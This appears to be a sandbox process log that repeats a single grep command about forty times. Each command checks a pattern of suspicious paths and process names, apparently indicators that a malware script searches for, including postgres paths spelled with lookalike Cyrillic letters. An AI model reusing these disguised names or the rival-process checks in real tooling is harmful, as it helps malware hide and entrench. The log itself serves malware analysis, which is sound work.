/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1118
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1123
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1128
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1133
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1138
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1143
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1148
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1153
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1158
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1163
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1168
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1173
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1178
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1183
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1188
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1193
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1199
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1205
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1212
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1218
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1224
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1231
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1238
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1244
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1250
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1257
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1264
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1270
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1276
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1283
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1289
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1295
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1302
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1309
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1315
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1321
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1328
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1333
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1338
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1343
-
-
